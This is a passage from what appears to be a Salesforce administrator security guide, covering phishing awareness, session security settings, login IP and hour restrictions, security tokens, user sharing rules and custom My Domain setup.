credit card details by masquerading as a trustworthy entity in an electronic communication. Phishers often direct users to enter
details at a fake website whose URL and look-and-feel are almost identical to the legitimate one. As the salesforce.com
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community grows, it has become an increasingly appealing target for phishers. You will never get an email or a phone call
from a salesforce.com employee asking you to reveal a password, so you should refuse to reveal it to anyone. You can report
any suspicious activities by clicking the Report a Suspicious Email link under the Trust tab at http://trust.salesforce.com.

Malware is software designed to infiltrate or damage a computer system without the owner's informed consent. It is a general
term used to cover a variety of forms of hostile, intrusive, or annoying software, and it includes computer viruses and spyware.

What Salesforce.com is Doing
Customer security is the foundation of customer success, so salesforce.com will continue to implement the best possible practices
and technologies in this area. Recent and ongoing actions include:

• Actively monitoring and analyzing logs to enable proactive alerts to customers who have been affected.
• Collaborating with leading security vendors and experts on specific threats.
• Executing swift strategies to remove or disable fraudulent sites (often within an hour of detection).
• Reinforcing security education and tightening access policies within salesforce.com.
• Evaluating and developing new technologies both for our customers and for deployment within our infrastructure.

What Salesforce.com Recommends You Do
Salesforce.com is committed to setting the standards in software-as-a-service as an effective partner in customer security. So,
in addition to internal efforts, salesforce.com strongly recommends that customers implement the following changes to enhance
security:

• Modify your Salesforce implementation to activate IP range restrictions. This will allow users to access Salesforce only
from your corporate network or VPN, thus providing a second factor of authentication. For more information, see Setting
Session Security on page 565 and Restricting Login IP Ranges for Your Organization on page 568.

• Educate your employees not to open suspect emails and to be vigilant in guarding against phishing attempts.
• Use security solutions from leading vendors such as Symantec to deploy spam filtering and malware protection.
• Designate a security contact within your organization so that salesforce.com can more effectively communicate with you.

Contact your salesforce.com representative with this information.
• Consider using two-factor authentication techniques, such as RSA tokens, to restrict access to your network.

Salesforce.com has a Security Incident Response Team to respond to any security issues. To report a security incident or
vulnerability to salesforce.com, please contact security@salesforce.com. Describe the issue in detail, and the team will respond
promptly.

Security Infrastructure
One of the core features of a multi-tenant platform is the use of a single pool of computing resources to service the needs of
many different customers. Salesforce protects your organization's data from all other customer organizations by using a unique
organization identifier, which is associated with each user's session. Once you log in to your organization, your subsequent
requests are associated with your organization, using this identifier.

Salesforce utilizes some of the most advanced technology for Internet security available today. When you access the application
using a Salesforce-supported browser, Secure Socket Layer (SSL) technology protects your information using both server
authentication and data encryption, ensuring that your data is safe, secure, and available only to registered users in your
organization.

In addition, Salesforce is hosted in a secure server environment that uses a firewall and other advanced technology to prevent
interference or access from outside intruders.
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Auditing
Auditing features do not secure your organization by themselves, but these features provide information about usage of the
system, which can be critical in diagnosing potential or real security issues. It is important that someone in your organization
perform regular audits to detect potential abuse. The other security features provided by Salesforce are preventative. To verify
that your system is actually secure, you should perform audits to monitor for unexpected changes or usage trends.

Auditing features include:

Record Modification Fields

All objects include fields to store the name of the user who created the record and who last modified the record. This
provides some basic auditing information.

Login History

You can review a list of successful and failed login attempts to your organization for the past six months. See Monitoring
Login History on page 661.

Field History Tracking

You can also enable auditing for individual fields, which will automatically track any changes in the values of selected
fields. Although auditing is available for all custom objects, only some standard objects allow field-level auditing. See
Tracking Field History on page 666.

Setup Audit Trail

Administrators can also view a Setup Audit Trail, which logs when modifications are made to your organization’s
configuration. See Monitoring Setup Changes on page 663.

Session Security
After logging in, a user establishes a session with the platform. Use session security to limit exposure to your network when a
user leaves their computer unattended while still logged on. It also limits the risk of internal attacks, such as when one employee
tries to use another employee’s session.

You can control the session expiration time window for user logins. Session expiration allows you to select a timeout for user
sessions. The default session timeout is two hours of inactivity. When the session timeout is reached, users are prompted with
a dialog that allows them to log out or continue working. If they do not respond to this prompt, they are automatically logged
out.

Note:  When a user closes a browser window or tab they are not automatically logged off from their Salesforce session.
Please ensure that your users are aware of this, and that they end all sessions properly by clicking Your Name >
Logout.

By default, Salesforce uses SSL (Secure Sockets Layer) and requires secure connections (HTTPS) for all communication. The
Require secure connections (HTTPS) setting determines whether SSL (HTTPS) is required for access to Salesforce,
apart from Force.com sites, which can still be accessed using HTTP. If you disable this setting and change the URL from
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https:// to http://, you can still access the application. However, you should require all sessions to use SSL for added
security. See Setting Session Security on page 565.

See Also:
Restricting Login IP Ranges for Your Organization

Setting Session Security

The Login IP Ranges setting is available in: Personal, Contact Manager, Group, Professional, and Database.com
Editions (Valid IP addresses can be set at the profile level for Enterprise, Unlimited, Developer, and Database.com
Editions)

The Lock sessions to the IP address from which they originated setting is available in: Enterprise,
Unlimited, Developer, and Database.com Editions

All other settings available in: Personal, Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and
Database.com Editions

User Permissions Needed

“Customize Application”To set session security:

You can modify session security settings to specify connection type, timeout settings, and more.

1. From Setup, click Security Controls > Session Settings.
2. Customize the session security settings.

DescriptionField

Length of time after which the system logs out inactive users. Select a
value between 15 minutes and 12 hours. Choose a shorter timeout period

Timeout value

if your organization has sensitive information and you want to enforce
stricter security.

Note:  The last active session time value isn’t updated until
halfway through the timeout period. That is, if you have a 30
minute timeout, the system won’t check for activity until 15
minutes have passed. For example, assume you have a 30 minute
timeout value. If you update a record after 10 minutes, the last
active session time value won’t be updated because there was
no activity after 15 minutes. You’ll be logged out in 20 more
minutes (30 minutes total) because the last active session time
wasn’t updated. Suppose you update a record after 20 minutes.
That’s five minutes after the last active session time is checked,
so your timeout resets and you have another 30 minutes before
being logged out, for a total of 50 minutes.
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DescriptionField

Determines whether the system prompts inactive users with a timeout
warning message. Users are prompted 30 seconds before timeout as
specified by the Timeout value.

Disable session timeout warning
popup

Determines whether user sessions are locked to the IP address from
which the user logged in; helping to prevent unauthorized persons from
hijacking a valid session.

Lock sessions to the IP address
from which they originated

Note:  This may inhibit various applications and mobile devices.

Determines whether HTTPS is required to log in to or access Salesforce,
apart from Force.com sites, which can still be accessed using HTTP.

This option is enabled by default for security reasons. It should not be
disabled.

Require secure connections (HTTPS)

Note:  The Resetting Passwords page can only be accessed using
HTTPS.

Determines whether an administrator that is logged in as another user
is returned to their previous session after logging out as the secondary
user.

If the option is enabled, an administrator must log in again to continue
using Salesforce after logging out as the user; otherwise, the administrator
is returned to their original session after logging out as the user.

Force relogin after Login-As-User

Restricts session ID cookie access. A cookie with the HttpOnly attribute
is not accessible via non-HTTP methods, such as calls from JavaScript.

Require HttpOnly attribute

Note: If you have a custom or packaged application that uses
JavaScript to access session ID cookies, selecting Require
HttpOnly attribute breaks your application because it
denies the application access to the cookie. The Developer
Console and AJAX Toolkit debugging window are also not
available if the Require HttpOnly attribute is selected.

Allows the user’s browser to store usernames. If enabled, after an initial
log in, usernames are auto-filled into the User Name field on the login

Enable caching and password
autocomplete on login page

page. This preference is selected by default and caching and autocomplete
are enabled.

Enables users to receive a one-time PIN delivered via SMS. Once
enabled, administrators or users must verify their mobile phone number
before taking advantage of this feature.

Enable SMS-based identity
confirmation

566

Session SecuritySecurity



DescriptionField

Specifies a range of IP addresses users must log in from (inclusive), or
the login will fail. Users need to activate their computers to successfully
log in from IP addresses outside this range.

To specify a range, click New and enter a lower and upper IP address to
define the range.

Login IP Ranges

This field is not available in Enterprise, Unlimited, and Developer
Editions. In those editions, you can specify valid IP addresses per profile.

Protects against clickjack attacks on setup Salesforce pages. Clickjacking
is also known as a user interface redress attack. (Setup pages are available
from the Setup menu.)

Enable clickjack protection for
setup pages

Protects against clickjack attacks on non-setup Salesforce pages.
Clickjacking is also known as a user interface redress attack. Setup pages

Enable clickjack protection for
non-setup Salesforce pages

already include protection against clickjack attacks. (Setup pages are
available from the Setup menu.)

Protects against clickjack attacks on your Visualforce pages. Clickjacking
is also known as a user interface redress attack.

Enable clickjack protection for
non-setup customer Visualforce
pages

Warning:  If you use custom Visualforce pages within a frame
or iframe, you may see a blank page or the page may display
without the frame. For example, Visualforce pages in a page
layout do not function when clickjack protection is on.

Protects against Cross Site Request Forgery (CSRF) attacks by modifying
non-setup pages to include a random string of characters in the URL

Enable CSRF protection on GET
requests on non-setup pages

parameters or as a hidden form field. With every GET and POST
Enable CSRF protection on POST
requests on non-setup pages

request, the application checks the validity of this string of characters
and doesn’t execute the command unless the value found matches the
value expected.

3. Click Save.

See Also:
Session Security
Finding the Setup Menu
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Restricting Login IP Ranges for Your Organization

Available in: All Editions

User Permissions Needed

“Login Challenge Enabled”To view network access:

“Manage Users”To change network access:

Note: Who Sees What: Organization Access (4:25 minutes)

Watch how you can restrict login through IP ranges and login hours.

To help protect your organization’s data from unauthorized access, you can specify a list of IP addresses from which users can
always log in without receiving a login challenge:

1. From Setup, click Security Controls > Network Access.
2. Click New.
3. Enter a valid IP address in the Start IP Address field and a higher IP address in the End IP Address field.

The start and end addresses define the range of allowable IP addresses from which users can log in. If you want to allow
logins from a single IP address, enter the same address in both fields. For example, to allow logins from only 125.12.3.0,
enter 125.12.3.0 as both the start and end addresses.

The start and end IP addresses in an IPv4 range must include no more than 33,554,432 addresses (225, a /7 CIDR block).
For example, the following ranges are valid:

• 0.0.0.0 to 1.255.255.255
• 132.0.0.0 to 132.255.255.255
• 132.0.0.0 to 133.255.255.255

However, ranges like 0.0.0.0 to 2.255.255.255 or 132.0.0.0 to 134.0.0.0 are too large.

The start and end IP addresses in an IPv6 range must include no more than 79,228,162,514,264,337,593,543,950,336
addresses (296, a /32 CIDR block). For example, the following range is valid: 2001:8000:: to
2001:8000:ffff:ffff:ffff:ffff:ffff:ffff. However, ranges like :: to
ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff or 2001:8000:: to 2001:8001:: are too large.

4. Click Save.

Note:  For organizations that were activated before December 2007, Salesforce automatically populated your
organization’s trusted IP address list in December 2007, when this feature was introduced. The IP addresses from
which trusted users had already accessed Salesforce during the past six months were added.

Note: Both IP addresses in a range must be either IPv4 or IPv6. In ranges, IPv4 addresses exist in the IPv4-mapped
IPv6 address space ::ffff:0:0 to ::ffff:ffff:ffff, where ::ffff:0:0 is 0.0.0.0 and ::ffff:ffff:ffff
is 255.255.255.255. A range can’t include IP addresses inside of the IPv4-mapped IPv6 address space if it also
includes IP addresses outside of the IPv4-mapped IPv6 address space. Ranges such as 255.255.255.255 to
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::1:0:0:0 or :: to ::1:0:0:0 are not allowed. You can set up IPv6 addresses in all organizations, but IPv6 is
only enabled for login in sandbox organizations from the Spring ’12 release and later.

See Also:
Session Security
Setting Login Restrictions
Security Implementation Guide

USER SECURITY

User Security Overview
Salesforce provides each user in your organization with a unique username and password that must be entered each time a
user logs in. Salesforce issues a session cookie only to record encrypted authentication information for the duration of a specific
session. The session cookie does not include either the username or password of the user. Salesforce does not use cookies to
store other confidential user and session information, but instead implements more advanced security methods based on
dynamic data and encoded session IDs.

See Also:
User Authentication
Network-Based Security
CAPTCHA Security for Data Exports

User Authentication
Salesforce has its own system of user authentication, but some companies prefer to use an existing single sign-on capability to
simplify and standardize their user authentication. You have two options to implement single sign-on—federated authentication
using Security Assertion Markup Language (SAML) or delegated authentication.

• Federated authentication using Security Assertion Markup Language (SAML) allows you to send authentication and
authorization data between affiliated but unrelated Web services. This enables you to sign-on to Salesforce from a client
application. Federated authentication using SAML is enabled by default for your organization.

• Delegated authentication single sign-on enables you to integrate Salesforce with an authentication method that you choose.
This enables you to integrate authentication with your LDAP (Lightweight Directory Access Protocol) server, or perform
single sign-on by authenticating using a token instead of a password. You manage delegated authentication at the permission
level, allowing some users to use delegated authentication, while other users continue to use their Salesforce-managed
password. Delegated authentication is set by permissions, not by organization. You must request that this feature be enabled
by salesforce.com. Contact salesforce.com to enable delegated authentication single sign-on for your organization.

The primary reasons for using delegated authentication include:

569

User Security OverviewUser Security

http://na1.salesforce.com/help/doc/en/salesforce_security_impl_guide.pdf


◊ Using a stronger type of user authentication, such as integration with a secure identity provider

◊ Making your login page private and not part of the general Internet, but rather, part of your corporate network, behind
your corporate firewall

◊ Differentiating your organization from all other companies that use Salesforce in order to reduce phishing attacks

See Also:
User Security Overview

Network-Based Security
User authentication determines who can log in, while network-based security limits where they can log in from and when. Use
network-based security to limit the window of opportunity for an attacker by restricting the origin of user logins. Network-based
security can also make it more difficult for an attacker to use stolen credentials.

To enhance network-based security, Salesforce includes the ability to restrict the hours during which users can log in and the
range of IP addresses from which they can log in. If IP address restrictions are defined for a user's profile and a login originates
from an unknown IP address, Salesforce does not allow the login. This helps to protect your data from unauthorized access
and “phishing” attacks.

To set the organization-wide list of trusted IP addresses from which users can always log in without a login challenge, see
Restricting Login IP Ranges for Your Organization on page 568. To restrict login hours by profile, or to restrict logins by IP
addresses for specific profiles, see Setting Login Restrictions on page 571.

See Also:
User Security Overview

CAPTCHA Security for Data Exports
By request, salesforce.com can also require users to pass a user verification test to export data from Salesforce. This simple,
text-entry test helps prevent malicious programs from accessing your organization’s data, as well as reducing the risk of
automated attacks. CAPTCHA is a type of network-based security. To pass the test, users must type two words displayed on
an overlay into the overlay’s text box field, and click a Submit button. Salesforce uses CAPTCHA technology provided by
reCaptcha to verify that a person, as opposed to an automated program, has correctly entered the text into the overlay.
CAPTCHA stands for “Completely Automated Public Turing test to tell Computers and Humans Apart.”

See Also:
User Security Overview
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Setting Login Restrictions
Available in: All Editions

To help protect your organization’s data against unauthorized access, you have several options for setting login restrictions.

Login Hours

For each profile, you can set the hours when users can log in. See:
• Viewing and Editing Login Hours in the Enhanced Profile User Interface

• Viewing and Editing Login Hours in the Original Profile User Interface

Login IP Address Ranges

For each profile, you can set the IP addresses from which users can log in. See:
• Restricting Login IP Ranges in the Enhanced Profile User Interface

• Restricting Login IP Addresses in the Original Profile User Interface

Organization-Wide Trusted IP Address List

For all users, you can set a list of IP address ranges from which they can always log in without receiving a login challenge.
See Restricting Login IP Ranges for Your Organization.

When users log in to Salesforce, either via the user interface, the API, or a desktop client such as Connect for Outlook,
Salesforce for Outlook, Connect Offline, Connect for Office, Connect for Lotus Notes, or the Data Loader, Salesforce confirms
that the login is authorized as follows:

1. Salesforce checks whether the user’s profile has login hour restrictions. If login hour restrictions are specified for the user’s
profile, any login outside the specified hours is denied.

2. Salesforce then checks whether the user’s profile has IP address restrictions. If IP address restrictions are defined for the
user’s profile, any login from an undesignated IP address is denied, and any login from a specified IP address is allowed.

3. If profile-based IP address restrictions are not set, Salesforce checks whether the user is logging in from an IP address they
have not used to access Salesforce before:

• If the user’s login is from a browser that includes a Salesforce cookie, the login is allowed. The browser will have the
Salesforce cookie if the user has previously used that browser to log in to Salesforce, and has not cleared the browser
cookies.

• If the user’s login is from an IP address in your organization’s trusted IP address list, the login is allowed.
• If the user’s login is from neither a trusted IP address nor a browser with a Salesforce cookie, the login is blocked.

Whenever a login is blocked or returns an API login fault, Salesforce must verify the user’s identity:

• For access via the user interface, the user is prompted to click Email me a verification code to send a verification email to
the address specified on the user’s Salesforce User Detail. The user copies the verification code from the email and pastes
it into their browser to activate their computer for logging in to Salesforce. The verification code included in the email is
valid for up to 24 hours from the time the user clicked Email me a verification code. After 24 hours, the verification code
expires, and user must repeat the activation process to log in.
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Note:  A user isn’t asked for a verification code the first time they log in to Salesforce.

• For access via the API or a client, the user must add their security token to the end of their password in order to log in. A
security token is an automatically-generated key from Salesforce. For example, if a user’s password is mypassword, and
their security token is XXXXXXXXXX, then the user must enter mypasswordXXXXXXXXXX to log in.

Users can obtain their security token by changing their password or resetting their security token via the Salesforce user
interface. When a user changes their password or resets their security token, Salesforce sends a new security token to the
email address on the user’s Salesforce record. The security token is valid until a user resets their security token, changes
their password, or has their password reset.

Tip:  We recommend that you obtain your security token using the Salesforce user interface from a trusted network
prior to attempting to access Salesforce from a new IP address.

Tips on Setting Login Restrictions

Consider the following when setting login restrictions:

• When a user’s password is changed, the user’s security token is automatically reset. The user may experience a blocked
login until he or she adds the automatically-generated security token to the end of his or her password when logging in to
Salesforce via the API or a client.

• Partner portal and Customer Portal users are not required to activate computers to log in.
• For more information on API login faults, see the Core Data Types Used in API Calls topic in the SOAP API Developer's

Guide.
• If single sign-on is enabled for your organization, API and desktop client users can’t log into Salesforce unless their IP

address is included on your organization’s list of trusted IP addresses or on their profile, if their profile has IP address
restrictions set. Futhermore, the single sign-on authority usually handles login lockout policies for users with the “Is Single
Sign-On Enabled” permission. However, if the security token is enabled for your organization, then your organization’s
login lockout settings determine the number of times a user can attempt to log in with an invalid security token before
being locked out of Salesforce.

• The following events count toward the number of times a user can attempt to log in with an invalid password before being
locked out of Salesforce, as defined in your organization’s login lockout settings:

◊ Each time a user is prompted to click Email me a verification code
◊ Each time a user incorrectly adds their security token to the end of their password to log into the API or a client

User Sharing Overview
Available in: Enterprise, Unlimited, and Developer Editions

Note:

User Sharing for external users is enabled by default when communities are enabled in your organization. User Sharing
for internal users is also available through a pilot program. For more information on enabling User Sharing for internal
users, contact salesforce.com.
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User Sharing lets you control how external users in communities can view or access other user records by restricting or extending
access to those records. For example, if your organization has a community enabled, you can set the organization-wide default
for external user records to Private, and then create a user sharing rule to enable members of the community to see and interact
with users who are in the sales representative role.

With user sharing, you can:

• Set the organization-wide default for user records for external users.

• Create user sharing rules based on group membership or other criteria.

• Create manual shares for user records.

• Control the visibility of external users in customer or partner portals and communities.

• If you are in the User Sharing pilot, you can additionally set the organization-wide default for internal users to Private.
The pilot is not fully compatible with Chatter.

See Also:
Understanding User Sharing
Restoring User Visibility Defaults

Understanding User Sharing

Available in: Enterprise, Unlimited, and Developer Editions

Note: User Sharing is enabled by default when your organization has Communities enabled and portal licenses
provisioned. User Sharing for internal users is also available through a pilot program. For more information on enabling
User Sharing for internal users, contact salesforce.com.

With user sharing, you can set an organization-wide default for external users’ access to internal and external User records,
and extend access to user records using sharing rules based on membership to public groups, roles, or territories, and manual
sharing to share individual user records with other users or groups.

Review these user sharing considerations before implementing them for your organization.

Organization-wide defaults for user records

This setting defaults to Private for external users. When the default access is set to Private for external users, they can
see only their own user record. Users with subordinates in the role hierarchy maintain read access to the user records of
those subordinates.

User sharing rules

General sharing rule considerations apply to user sharing rules. User sharing rules are based on membership to a public
group, role, or territory.  Each sharing rule shares members of a source group with those of the target group. You must
create the appropriate public groups, roles, or territories before creating your sharing rules. Users inherit the same access
as users below them in the role hierarchy.
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Manual sharing for user records

Manual sharing can grant read or edit access, but only if the access is greater than the default access for the target user.
Users inherit the same access as users below them in the role hierarchy. Apex managed sharing is not supported.

User sharing for external users

Users with the “Manage External Users” permission have access to external user records for Partner Relationship
Management, Customer Service, and Customer Self-Service portal users, regardless of sharing rules or organization-wide
default settings for User records. The “Manage External Users” permission does not grant access to guest or Chatter
External users.

User Sharing Compatibility

User Sharing does not fully support these features.
• Customizable Forecasts —All users are visible in the user lookup regardless the organization-wide default for the

user object.
• Chatter — Setting the organization-wide defaults for internal users to Private is part of a pilot program, which does

not fully support Chatter.

Setting the Organization-Wide Sharing Defaults for User Records

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To set default sharing access:

For user records, you can set the organization-wide sharing default to Private or Public Read Only for access by external users
such as community, customer portal, and partner portal users. The setting applies to user records for both internal and external
users. The default must be set to Private if there is at least one user who shouldn’t see a record. After setting the defaults, you
can open up access by granting Read/Write or Read Only access to selected user records.

Let’s say that your organization has internal users (employees and sales agents) and external users (customers/portal users)
under different sales agents or portal accounts, with these requirements:

• Employees can see everyone.
• Sales agents can see employees, other agents, and their own customer user records only.
• Customers can see other customers only if they are under the same agent or portal account.

To meet these requirements, set the default external access to Private, and extend access using sharing rules, manual sharing,
or user permissions.

When the feature is first turned on, the default access setting is Private for external users. The default for internal users is
Public Read Only and cannot be changed. To change the organization-wide defaults for external access to the user object:

1. From Setup, click Security Controls > Sharing Settings.
2. Click Edit in the Organization-Wide Defaults area.
3. Select the default external access you want to use for User records.
4. Click Save.
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Note:  Changing the organization-wide default to Private for internal users is available as a pilot program. For
information on enabling the pilot, contact salesforce.com.

Here is a common scenario for default internal and external access.

DescriptionDefault External
Access

Default Internal
Access

Internal users have Read access to all internal and external users. External
users don’t have Read access to internal or external users, except their
subordinates.

PrivatePublic Read Only

External users include community users, including portal users, and guest users.

See Also:
Separate Organization-Wide Defaults
User Sharing Overview
Controlling Who Community or Portal Users Can See

Creating User Sharing Rules

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To create sharing rules:

User sharing rules can be based on membership to public groups, roles, or territories, or on other criteria such as Department
and Title.  By default, you can define up to 300 user sharing rules, including up to 50 criteria-based sharing rules. Contact
Salesforce.com for information about increasing these limits.

User sharing rules based on membership enable user records belonging to members of one group to be shared with members
of another group. Before you can create a membership-based user sharing rule, confirm that the appropriate groups have been
created.

Users inherit the same access as users below them in the role hierarchy.

1. From Setup, click Security Controls > Sharing Settings.
2. In the User Sharing Rules related list, click New.
3. Enter the Label Name and click the Rule Name field to auto-populate it.
4. Select a rule type.
5. Depending on the rule type you selected, do the following:
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Based on group membership

Users who are members of a group can be shared with members of another group. In the Users who are members
of line, select a category from the first drop-down list and a set of users from the second drop-down list (or lookup
field, if your organization has over 200 groups, roles, or territories).

Based on criteria

Specify the Field, Operator, and Value criteria that records must match to be included in the sharing rule. The fields
available depend on the object selected, and the value is always a literal number or string. Click Add Filter Logic...
to change the default AND relationship between each filter.

6. In the Share with line, specify the group that should have access to the user records. Select a category from the first
drop-down list and a set of users from the second drop-down list or lookup field.

7. Select the sharing access setting for users.

DescriptionAccess Setting

Users can view, but not update, records.Read Only

Users can view and update records.Read/Write

See Also:
Editing User Sharing Rules
Sharing Rule Categories
User Sharing Overview

Editing User Sharing Rules

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To edit sharing rules:

For user sharing rules based on membership to groups, roles, or territories, you can edit only the access settings. For user
sharing rules based on other criteria, you can edit the criteria and access settings.

1. From Setup, click Security Controls > Sharing Settings.
2. In the User Sharing Rules related list, click Edit next to the rule you want to change.
3. Change the Label and Rule Name if desired.
4. If you selected a rule that’s based on group membership, skip to the next step. If you selected a rule that's based on criteria,

specify the criteria that records must match to be included in the sharing rule. The fields available depend on the object
selected, and the value must be a literal number or string. Click Add Filter Logic... to change the default AND relationship
between each filter.
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5. Select the sharing access setting for users. The User Access level applies to users who are members of the groups being
shared to.

DescriptionAccess Setting

Users can view, but not update, records.Read Only

Users can view and update records.Read/Write

6. Click Save.

See Also:
User Sharing Overview

Controlling Who Community or Portal Users Can See

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To set Community and Portal User Visibility:

If your organization has enabled a community and has portal licenses provisioned for it, User Sharing is enabled automatically.
When User Sharing is on, you can choose which other users community users can see by default. If your organization has
Customer or Partner Portals, you can choose a default for them as well. Users who can see one another can interact on all the
communities or portals in your organization. For example, if you would like to have a more private community, you can deselect
the Community User Visibility checkbox and use other sharing features like sharing rules, manual shares, or portal access.

For Communities and Portals, you can choose different defaults.

Communities

The initial default is to allow community users to be seen by all other internal and external users in communities they
are a member of. You can change the default to allow external users in communities to be seen only by themselves and
their superiors in the role hierarchy. The setting provides Read access only and applies to all communities in your
organization.

Visibility to users as a result of the Community User Visibility preference is not inherited through the role hierarchy.
If a manager in the role hierarchy is not a member of a community, but their subordinate is, the manager does not gain
access to other members of the community.

Portals

The initial default is to allow portal users to be seen by other portal users within the same account. You can change the
default to allow external users in portals to be seen by only themselves and their superiors in the role hierarchy. The
setting provides Read access only and applies to all of the portals in your organization.
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Note:  Partner portal users also have access to their channel manager.

1. From Setup, click Security Controls > Sharing Settings.
2. Click Edit in the Organization-Wide Defaults area.
3. Deselect the Portal User Visibility checkbox to allow users to be seen by only themselves and their superiors. Or select

the checkbox to let portal users be seen by all other portal users within the same account.
4. For Community User Visibility, deselect the checkbox to allow users to be seen only by themselves and their superiors.

Select the checkbox to allow community users to be seen by all other users in their communities.
5. Click Save.

Selecting either of these options is a quick way of overriding an organization-wide default setting of Private for external access
to the User object for Community or Portal users.

Once you have set these defaults, you can selectively expand access to users.

See Also:
Setting the Organization-Wide Sharing Defaults for User Records
Creating User Sharing Rules

Restoring User Visibility Defaults

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To restore user visibility defaults:

User Sharing enables you to restrict or extend access to user records. It is automatically available in organizations with
communities that use portal licenses. In Summer ‘13, User Sharing for internal users is also available as a pilot. You can restore
your defaults if you have previously used User Sharing.

To restore user visibility defaults:

1. From Setup, click Security Controls > Sharing Settings.
2. Set the organization-wide defaults to Public Read Only for internal access and Private for external access.
3. Enable portal account user access.

On the Sharings Settings page, select the Portal User Visibility checkbox. This option enables customer portal users to
see other users under the same portal account. Additionally, partner portal users can see the portal account owner.

4. Enable network member access.

On the Sharing Settings page, select the Community User Visibility checkbox. This option enables community members
to be seen by all other users in their communities.

5. Remove user sharing rules.
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On the Sharing Settings page, click Del next to all available user sharing rules.

6. Remove HVPU access to user records.

On the Customer Portal Setup page, click Del next to all available sharing sets for HVPUs.

After user visibility is restored to the defaults, all internal users are visible to each other, portal users under the same portal
account are visible to each other, and community members in the same community are visible to each other.

See Also:
Controlling Who Community or Portal Users Can See
User Sharing Overview

MY DOMAIN

My Domain Overview
Available in: Unlimited, Enterprise, Developer, Professional, and Group Editions.

Using My Domain, you can define a custom Salesforce domain name for your organization that highlights your brand, or a
different term that represents your business. Using a custom domain name provides important advantages, such as increased
security and better support for single sign-on. My Domain is also available for sandbox environments. You can only define a
custom domain name one time.

Note:  My Domain is subject to these additional Terms of Use.

Your domain name uses the standard URL format, including:

• The protocol: https://

• The subdomain prefix: your brand or term

• The domain: my.salesforce.com

For example, the login URL for a company called Universal Containers would be:
https://universalcontainers.my.salesforce.com/. You can use up to 40 characters.

It’s a snap to set up a custom domain name. After you decide on the name or term you want to use, My Domain checks to
make sure your subdomain is available. Then it registers the domain name and publishes it to the Internet. After a brief
turnaround period (from a minimum of 10 minutes to a maximum of 24 hours), you’ll receive an email to let you know your
new domain name is ready for testing.

To log in to the new URL for testing, click the Click here to login button on the My Domain page. This also enables single
sign-on and allows network users to access all authorized network resources without having to log in separately to each resource.
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When deployed, you have options for how you want to handle page requests that don’t use the new domain name. You can
block them entirely or redirect them to the new URL—with or without a message. You can also set the login policy to determine
how users are authenticated.

Login policy is affected by whether or not you have any authentication services available in your organization, such as
authentication providers and SAML, and if you’re using Multi-Provider Single Sign-On (multiple SAML SSO configurations).

• The default action is to use the regular user login page.

• If you have not explicitly set the login policy and have a single SAML 2.0 configuration in your organization with a login
URL specified, the default action becomes redirecting the user to that login URL.

• If you have multiple SAML 2.0 configurations enabled in your organization, the default action is to use the regular user
login page instead of arbitrarily selecting one of the SAML configurations.

You can always select any authentication service available in your organization instead of using the default action.

Important:  After you deploy your new domain name, you can’t reverse it. After deployment, all users will be redirected
to your new domain.

See Also:
Setting Up a Domain Name
My Domain URL Changes
Testing and Rolling Out Your New Domain Name
Guidelines for Implementing and Rolling Out Your Domain Name
Getting System Performance and Maintenance Information Using My Domain

Setting Up a Domain Name
Available in: Unlimited, Enterprise, Developer, Professional, and Group Editions.

User Permissions Needed

“Customize Application”To set up a domain name:

1. From Setup, click Company Profile > My Domain.
2. Enter the name you want to use within the sample URL. For example, the login URL for a company called Universal

Containers would be: https://universalcontainers.my.salesforce.com/. You can use up to 40 characters.
3. Click Check Availability. If your name is already taken, choose a different one.
4. Click Terms and Conditions to review your agreement, then select the checkbox.
5. You'll receive an email when your domain name is ready for testing. (It can take from 10 minutes to 24 hours.) Click the

URL in the email to login to Salesforce using your new domain name.

See Also:
My Domain Overview
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My Domain URL Changes
Available in: Unlimited, Enterprise, Developer, Professional, and Group Editions.

When you set up a domain name for your organization, all of your application URLs, including those of Visualforce pages,
will change. This table shows you the differences.

New URLOld URLURL Type

https://<subdomain>.my.salesforce.comhttps://login.salesforce.comLogin

https://<subdomain>.my.salesforce.com
/<pageID>

https://na1.salesforce.com/<pageID>Application page
or tab

https://<subdomain>--c.na1.visual.
force.com/apex/<pagename>

https://c.na1.visual.force.com/apex/<pagename>Visualforce page
with no namespace

https://<subdomain>--
<yournamespace>.na1.visual.force.com
/apex/<pagename>

https://<yournamespace101>.na1.visual.
force.com/apex/<pagename>

Visualforce page
with namespace

Note: If you implement My Domain in a sandbox environment, the URL format is
https://<subdomain>--<sandboxname>.<instance>.my.salesforce.com. Since you can't have namespaces
in a sandbox environment, the format of all Visualforce page URLs in a sandbox is
https://<subdomain>--<sandboxname>.<instance>.my.salesforce.com/apex/<pagename>.

See Also:
My Domain Overview

Testing and Rolling Out Your New Domain Name
After you set up your domain name, you’ll need to test it.

Available in: Unlimited, Enterprise, Developer, Professional, and Group Editions.

User Permissions Needed

“Customize Application”To set up a domain name:

Test the new domain name by clicking tabs and links that you use within your application. You'll notice that all the tabs and
pages show your new domain name. After you test your domain name, you're ready to roll it out to users.

1. When you finish testing your new domain name, from Setup, click Company Profile > My Domain and click Deploy to
Users to roll out the new domain name to your organization.
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Important:  After you deploy your new domain name, you can’t reverse it. After deployment, all users will be
redirected to your new domain.

2. Click Edit in the My Domain Settings related list. If you want to accept logins from your new domain only, select the
Login Policy checkbox. If you don't require users to log in from the new domain, they'll be blocked or redirected based
on your redirect setting.

3. Select a redirect policy. If you want to redirect page requests that don't use the new domain name, select a redirect option.
Users can access pages with or without a message explaining the URL change.

4. Click Save.

See Also:
My Domain Overview

Guidelines for Implementing and Rolling Out Your Domain
Name

Available in: Unlimited, Enterprise, Developer, Professional, and Group Editions.

• If your domain is registered but has not yet been deployed, URLs will show My Domain URLs when you log in from the
My Domain login page. However, links that originate from merge fields that are embedded in emails sent asynchronously,
such as workflow emails, will still contain the old URLs. After your domain is deployed, those links will show the new My
Domain URLs.

• If you block application page requests that don't use the new Salesforce domain name URLs, let your users know they
need to either update old bookmarks or create new ones for the login page and any tabs or links within the application.
Users will be required to use the new URLs if you block page requests.

• If you choose to redirect page requests to new URLs and provide a warning message, let your users know that they should
update their bookmarks the first time they're redirected.

• If you have customized your Salesforce UI with features such as custom buttons or Visualforce pages, make sure you test
